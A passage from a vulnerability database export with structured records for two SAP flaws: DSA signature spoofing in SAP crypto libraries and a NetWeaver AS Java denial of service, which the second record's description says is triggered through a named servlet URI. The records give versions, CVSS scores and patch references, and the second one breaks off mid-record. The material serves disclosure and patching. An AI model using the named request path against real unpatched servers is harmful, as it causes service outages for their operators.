SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors. Multiple SAP products are prone to to a security vulnerability that may allow attackers to conduct spoofing attacks. An attacker can exploit this issue to conduct spoofing attacks, disclose sensitive information and perform unauthorized actions. This may aid in further attacks. The following products are vulnerable: Versions prior to SAP SAPCRYPTOLIB 5.555.38 Versions prior to SAP SAPSECULIB 8.4.30 Versions prior to SAP CommonCryptoLib 8.4.30
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0218",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "sapseculib",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "*"
},
{
"model": "sapcryptolib",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "5.555.37"
},
{
"model": "commoncryptolib",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "8.4.29"
},
{
"model": "hana",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": null
},
{
"model": "commoncryptolib",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "8.4.29"
},
{
"model": "commoncryptolib",
"scope": "lt",
"trust": 0.8,
"vendor": "sap",
"version": "8.4.30"
},
{
"model": "hana",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "sapcryptolib",
"scope": "lt",
"trust": 0.8,
"vendor": "sap",
"version": "5.555.38"
},
{
"model": "sapseculib",
"scope": "lt",
"trust": 0.8,
"vendor": "sap",
"version": "8.4.30"
},
{
"model": "sapcrytolib",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "5.555.37"
},
{
"model": "sapseculib",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "8.4.29"
},
{
"model": "sapseculib",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "sapcryptolib",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "5.555.37"
},
{
"model": "sapcryptolib",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver abap",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "hana",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "commoncryptolib",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "sapseculib",
"scope": "ne",
"trust": 0.3,
"vendor": "sap",
"version": "8.4.30"
},
{
"model": "sapcryptolib",
"scope": "ne",
"trust": 0.3,
"vendor": "sap",
"version": "5.555.38"
},
{
"model": "commoncryptolib",
"scope": "ne",
"trust": 0.3,
"vendor": "sap",
"version": "8.4.30"
}
],
"sources": [
{
"db": "BID",
"id": "71027"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:commoncryptolib:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "8.4.29",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:sapcryptolib:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "5.555.37",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:sapseculib:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:hana:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8587"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP",
"sources": [
{
"db": "BID",
"id": "71027"
}
],
"trust": 0.3
},
"cve": "CVE-2014-8587",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2014-8587",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-8587",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-043",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAPCRYPTOLIB before 5.555.38, SAPSECULIB, and CommonCryptoLib before 8.4.30, as used in SAP NetWeaver AS for ABAP and SAP HANA, allows remote attackers to spoof Digital Signature Algorithm (DSA) signatures via unspecified vectors. Multiple SAP products are prone to to a security vulnerability that may allow attackers to conduct spoofing attacks. \nAn attacker can exploit this issue to conduct spoofing attacks, disclose sensitive information and perform unauthorized actions. This may aid in further attacks. \nThe following products are vulnerable:\nVersions prior to SAP SAPCRYPTOLIB 5.555.38\nVersions prior to SAP SAPSECULIB 8.4.30\nVersions prior to SAP CommonCryptoLib 8.4.30",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"db": "BID",
"id": "71027"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8587",
"trust": 2.7
},
{
"db": "SECUNIA",
"id": "57606",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005218",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-043",
"trust": 0.6
},
{
"db": "BID",
"id": "71027",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "71027"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
]
},
"id": "VAR-201411-0218",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:38:08.069000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2067859",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "Potential Exposure to Digital Signature Spoofing #ABAP #Netweaver #SAP Note 2067859 http://ow.ly/CMsqF",
"trust": 0.8,
"url": "https://twitter.com/sap_gsupport/status/522401681997570048"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-310",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"db": "NVD",
"id": "CVE-2014-8587"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://blog.onapsis.com/sap-security-note-2067859-potential-exposure-to-digital-signature-spoofing/"
},
{
"trust": 1.9,
"url": "http://service.sap.com/sap/support/notes/2067859"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/57606"
},
{
"trust": 1.6,
"url": "https://twitter.com/sap_gsupport/status/522401681997570048"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8587"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8587"
},
{
"trust": 0.3,
"url": "http://www.saphana.com/welcome"
},
{
"trust": 0.3,
"url": "http://scn.sap.com/community/netweaver-portal"
}
],
"sources": [
{
"db": "BID",
"id": "71027"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "71027"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-15T00:00:00",
"db": "BID",
"id": "71027"
},
{
"date": "2014-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"date": "2014-11-04T15:55:07.310000",
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"date": "2014-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-15T00:00:00",
"db": "BID",
"id": "71027"
},
{
"date": "2014-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005218"
},
{
"date": "2023-10-03T15:48:10.677000",
"db": "NVD",
"id": "CVE-2014-8587"
},
{
"date": "2014-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS ABAP and SAP HANA Used in SAPCRYPTOLIB In products such as DSA Vulnerability that is forged as a signature",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005218"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-043"
}
],
"trust": 0.6
}
}
var-201611-0319
Vulnerability from variot
SAP NetWeaver AS JAVA 7.4 allows remote attackers to cause a Denial of Service (null pointer exception and icman outage) via an HTTPS request to the sap.com~P4TunnelingApp!web/myServlet URI, aka SAP Security Note 2313835. Vendors have confirmed this vulnerability SAP Security Note 2313835 It is released as. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. SAP NetWeaver Application Server Java is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause denial-of-service conditions. SAP NetWeaver Application Server Java 7.4 is vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201611-0319",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "single sign on",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "92418"
},
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"db": "NVD",
"id": "CVE-2016-9562"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-9562"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Onapsis Research Labs,Vahagn Vardanyan from ERPScan.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
],
"trust": 0.6
},
"cve": "CVE-2016-9562",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-9562",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-9562",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-9562",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201611-534",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-9562",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9562"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"db": "NVD",
"id": "CVE-2016-9562"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS JAVA 7.4 allows remote attackers to cause a Denial of Service (null pointer exception and icman outage) via an HTTPS request to the sap.com~P4TunnelingApp!web/myServlet URI, aka SAP Security Note 2313835. Vendors have confirmed this vulnerability SAP Security Note 2313835 It is released as. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. SAP NetWeaver Application Server Java is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause denial-of-service conditions. \nSAP NetWeaver Application Server Java 7.4 is vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-9562"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"db": "BID",
"id": "92418"
},
{
"db": "BID",
"id": "95363"
},
{
"db": "VULMON",
"id": "CVE-2016-9562"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-9562",
"trust": 3.1
},
{
"db": "BID",
"id": "95363",
"trust": 2.0
},
{
"db": "BID",
"id": "92418",
"trust": 2.0
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201611-534",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2016-9562",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9562"
},
{
"db": "BID",
"id": "92418"
},
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"db": "NVD",
"id": "CVE-2016-9562"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"id": "VAR-201611-0319",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:34:21.205000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Cyber Threat Intelligence report - August 2016 (2313835)",
"trust": 0.8,
"url": "https://blogs.sap.com/2016/08/10/sap-cyber-threat-intelligence-report-august-2016/"
},
{
"title": "SAP NetWeaver Application Server Java Remediation measures for denial of service vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=65869"
},
{
"title": "SAP_vulnerabilities",
"trust": 0.1,
"url": "https://github.com/vah13/sap_vulnerabilities "
},
{
"title": "radamsa-Fuzzer",
"trust": 0.1,
"url": "https://github.com/sunzu94/radamsa-fuzzer "
},
{
"title": "RADAMSA",
"trust": 0.1,
"url": "https://github.com/stephenharuna/radamsa "
},
{
"title": "radamsa",
"trust": 0.1,
"url": "https://github.com/hwangtaewon/radamsa "
},
{
"title": "radamsa",
"trust": 0.1,
"url": "https://github.com/benoit-a/radamsa "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9562"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"db": "NVD",
"id": "CVE-2016-9562"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/95363"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/92418"
},
{
"trust": 1.7,
"url": "https://erpscan.io/advisories/erpscan-16-033-sap-netweaver-java-icman-dos-vulnerability/"
},
{
"trust": 1.2,
"url": "http://www.sap.com"
},
{
"trust": 1.1,
"url": "https://erpscan.com/advisories/erpscan-16-033-sap-netweaver-java-icman-dos-vulnerability/"
},
{
"trust": 0.9,
"url": "https://www.onapsis.com/blog/sap-security-notes-january-2017-continued-security-focus-sap-defense"
},
{
"trust": 0.9,
"url": "https://erpscan.com/advisories/erpscan-17-001-sap-java-dos-bc-iam-sso-otp-package-use-qr-servlet/"
},
{
"trust": 0.9,
"url": "https://launchpad.support.sap.com/#/notes/2389042"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-9562"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-9562"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2313835"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/476.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/vah13/sap_vulnerabilities"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-9562"
},
{
"db": "BID",
"id": "92418"
},
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
"db": "NVD",
"id": "CVE-2016-9562"
},
{
"db": "CNNVD",
"id": "CNNVD-201611-534"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-9562"
},
{
"db": "BID",
"id": "92418"
},
{
"db": "BID",
"id": "95363"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005936"
},
{
